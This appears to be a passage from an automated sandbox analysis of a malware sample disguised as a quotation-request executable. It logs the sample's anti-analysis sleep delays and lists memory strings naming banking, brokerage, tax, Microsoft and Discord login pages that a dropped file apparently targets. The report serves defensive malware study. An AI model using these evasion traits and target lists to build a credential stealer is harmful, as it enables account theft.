                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -594922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -594812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -594703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -594593s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 6696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep count: 32 > 30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -29514790517935264s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088Thread sleep count: 2530 > 30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088Thread sleep count: 7328 > 30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599671s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599558s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -599015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598905s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598796s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598575s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598451s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598316s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -598077s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597968s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597421s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -597093s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596874s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -596030s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595921s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595774s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595504s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -595046s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594936s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594718s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594390s >= -30000s
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864Thread sleep time: -594281s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599763Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597653Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599671
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599558
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598905
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598796
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598575
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598451
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598316
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598187
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598077
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597968
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597859
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597750
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597640
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597531
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597421
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597312
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597203
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597093
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596984
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596874
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596765
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596218
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596030
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595921
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595774
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595504
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595375
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595265
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595156
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595046
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594936
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594828
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594718
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594609
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594500
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594390
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594281
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4515858199.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4516378063.0000000001346000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
